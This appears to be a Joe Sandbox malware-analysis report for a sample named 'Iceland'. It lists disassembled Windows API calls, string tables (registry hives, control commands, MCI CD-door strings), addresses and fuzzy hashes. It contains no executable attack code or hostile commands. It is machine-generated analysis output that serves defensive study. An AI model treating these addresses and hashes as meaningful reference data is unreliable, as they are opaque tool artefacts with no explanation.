                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                • Opcode ID: 7ddbb827f11e74d77c02c451d75f031b7e2e3485a0639c089513435becb346be
                                                                                                                                                                                                                                                                • Instruction ID: c61b5c36d3da7c69ae435a10c0ca8c6480ff7209b5b9fd138ed3575062dacba3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ddbb827f11e74d77c02c451d75f031b7e2e3485a0639c089513435becb346be
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B1278356042119FDB14DF18C981B6AB7E5FF89714F0488ADF88A9B3A2DB35ED41CB81
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00AB1462
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB149D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AB14F0
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB1526
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB15A2
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB161D
                                                                                                                                                                                                                                                                  • Part of subcall function 00A3FD52: _wcslen.LIBCMT ref: 00A3FD5D
                                                                                                                                                                                                                                                                  • Part of subcall function 00A83535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A83547
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                • Opcode ID: d8afc4d254d88f1396b7ad48abe05c56fcf1ed933232e4c4e76b5bdd94686fec
                                                                                                                                                                                                                                                                • Instruction ID: ee541ccd9ab18e549e475dd3f0436594371cd9093a071e1d343fde3f1e35ca5e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8afc4d254d88f1396b7ad48abe05c56fcf1ed933232e4c4e76b5bdd94686fec
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24E1B1726043418FCB14EF29C5608AAB7E6FF98314F54896CF8969B362DB34ED45CB81
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                • Opcode ID: e4faa78330d00d9833c154ec8232cfbf6a492faf3e27349cdd46ee7fe81413c2
                                                                                                                                                                                                                                                                • Instruction ID: fd8076e0e9715de40dd304c48b292a4d6c9236d526ce136d9b1c442993542a33
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4faa78330d00d9833c154ec8232cfbf6a492faf3e27349cdd46ee7fe81413c2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB71E772A105278BCB109F7CCA405FE33A1AF66758F250124F8ABAB6D4EB35DD45C390
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB8DB5
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB8DC9
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB8DEC
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB8E0F
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AB8E4D
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00AB6691), ref: 00AB8EA9
                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AB8EE2
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00AB8F25
                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AB8F5C
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00AB8F68
                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AB8F78
                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?,00AB6691), ref: 00AB8F87
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AB8FA4
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AB8FB0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                • Opcode ID: b23e0e96ce01cf143618ff41e475b391ea9dffc7d69b76314eb7991e9b1b809f
                                                                                                                                                                                                                                                                • Instruction ID: 4ff74bafb2e75f03d4817c4222102ef3495e29762b9ad182e0c0c0df63565c9b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b23e0e96ce01cf143618ff41e475b391ea9dffc7d69b76314eb7991e9b1b809f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A61AB71900615BAEB14DFA8DC45BFE77ACBF08B10F104616F815E61D2EB78E991CBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 00A9493D
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A94948
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A9499F
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A949DD
                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 00A94A1B
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A94A63
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A94A9E
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A94ACC
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                • Opcode ID: f30325fe27f9fb9c2e3ba43465d1690d814981ed036d5af7da278ebe984dd60b
                                                                                                                                                                                                                                                                • Instruction ID: f0bc29b6d43cb90d2142668a9e0dc2ebb8ce40bb0d6546c4e82d847ac781e28d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f30325fe27f9fb9c2e3ba43465d1690d814981ed036d5af7da278ebe984dd60b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D71E0726086119FCB10EF28D98096FB7E8FF98758F10492DF89697261EB30DD46CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadIconW.USER32(00000063), ref: 00A86395
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A863A7
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00A863BE
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00A863D3
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00A863D9
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00A863E9
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00A863EF
                                                                                                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00A86410
                                                                                                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00A8642A
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00A86433
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8649A
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00A864D6
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00A864DC
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00A864E3
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00A8653A
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00A86547
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 00A8656C
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A86596
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 895679908-0
                                                                                                                                                                                                                                                                • Opcode ID: f6e49fc3aa1b65d58487d9dc168d70158fcbf7c9dd746452c59606a398ee7674
                                                                                                                                                                                                                                                                • Instruction ID: bc2ed416cf01aefcd9bee9b6040efbaa19bdd5a8f2cc761ba9e8884edb7b0077
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6e49fc3aa1b65d58487d9dc168d70158fcbf7c9dd746452c59606a398ee7674
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39718F31900705AFEB20EFA8CE45BAEBBF5FF48704F100A18E586A65A0DB75E945CB50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00AA0884
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00AA088F
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00AA089A
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00AA08A5
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00AA08B0
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00AA08BB
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 00AA08C6
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00AA08D1
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00AA08DC
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00AA08E7
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00AA08F2
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00AA08FD
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00AA0908
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00AA0913
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00AA091E
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00AA0929
                                                                                                                                                                                                                                                                • GetCursorInfo.USER32(?), ref: 00AA0939
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AA097B
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                • Opcode ID: 8ea83ed2870ddb770586ea6bbc495e94bfe342f90224fab7e00e180c8ea9cceb
                                                                                                                                                                                                                                                                • Instruction ID: 10da52d3c7a8e4bf91414793c040be3c4ceccd6237deedd794e13106b37dbb23
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ea83ed2870ddb770586ea6bbc495e94bfe342f90224fab7e00e180c8ea9cceb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F44142B0D083196ADB10DFBA8C89C6EBFE8FF04754B50452AE15CEB291DB789901CF91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00A40436
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00AF170C,00000FA0,22926BF9,?,?,?,?,00A62733,000000FF), ref: 00A4048C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00A62733,000000FF), ref: 00A40497
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00A62733,000000FF), ref: 00A404A8
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00A404BE
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A404CC
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A404DA
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A40505
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A40510
                                                                                                                                                                                                                                                                • ___scrt_fastfail.LIBCMT ref: 00A40457
                                                                                                                                                                                                                                                                  • Part of subcall function 00A40413: __onexit.LIBCMT ref: 00A40419
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • SleepConditionVariableCS, xrefs: 00A404C4
                                                                                                                                                                                                                                                                • WakeAllConditionVariable, xrefs: 00A404D2
                                                                                                                                                                                                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A40492
                                                                                                                                                                                                                                                                • kernel32.dll, xrefs: 00A404A3
                                                                                                                                                                                                                                                                • InitializeConditionVariable, xrefs: 00A404B8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                • Opcode ID: 9abbfac88002f9ded27c7e9a08a339c3b0b86f930e14d5c12910ac6dee566308
                                                                                                                                                                                                                                                                • Instruction ID: a49f1a014232a647f9d44a27c7905f81ae814cff589a263b2fe6bfab73a48aa2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9abbfac88002f9ded27c7e9a08a339c3b0b86f930e14d5c12910ac6dee566308
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2213B3AA40704BBD711ABE8AC46F6933A8FB84B61F000729FB06D7290EF749C019E51
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen
                                                                                                                                                                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                • Opcode ID: e98bfa21796080c17a3d6408b7c53a179a2cc34f40eed585c013dc84c73d116b
                                                                                                                                                                                                                                                                • Instruction ID: 533a4ae7e94228c7fe541d770cdc5986e3a359e1afd3133c3f1ed00f3ff8c256
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e98bfa21796080c17a3d6408b7c53a179a2cc34f40eed585c013dc84c73d116b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77E11373E00516AFCF18AFB8C9416EEFBB0BF54B50F144529E456E7240EB30AE598790
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharLowerBuffW.USER32(00000000,00000000,00ABDCD0), ref: 00A94F6C
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A94F80
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A94FDE
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A95039
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A95084
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A950EC
                                                                                                                                                                                                                                                                  • Part of subcall function 00A3FD52: _wcslen.LIBCMT ref: 00A3FD5D
                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,00AE7C10,00000061), ref: 00A95188
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                • Opcode ID: 6a0bee1d61e480a7f665caa4c0ffd51c0b26a704edf92fe0c304fc03771777d6
                                                                                                                                                                                                                                                                • Instruction ID: 24bfed001a1a25c9f94de35f834dd2401eb27ef3b1c59ba96be136e08c6d5c76
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a0bee1d61e480a7f665caa4c0ffd51c0b26a704edf92fe0c304fc03771777d6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8B10431B087029FCB10EF38D992A6EB7E5BF94720F104A2DF59687291DB30D845CB92
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AABBF8
                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AABC10
                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AABC34
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AABC60
                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AABC74
                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AABC96
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AABD92
                                                                                                                                                                                                                                                                  • Part of subcall function 00A90F4E: GetStdHandle.KERNEL32(000000F6), ref: 00A90F6D
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AABDAB
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AABDC6
                                                                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AABE16
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00AABE67
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00AABE99
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AABEAA
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AABEBC
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AABECE
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00AABF43
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00ABDCD0), ref: 00AA4B18
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00AA4B2A
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00ABDCD0), ref: 00AA4B4F
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00ABDCD0), ref: 00AA4B9B
                                                                                                                                                                                                                                                                • StringFromGUID2.OLE32(?,?,00000028,?,00ABDCD0), ref: 00AA4C05
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000009), ref: 00AA4CBF
                                                                                                                                                                                                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00AA4D25
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AA4D4F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
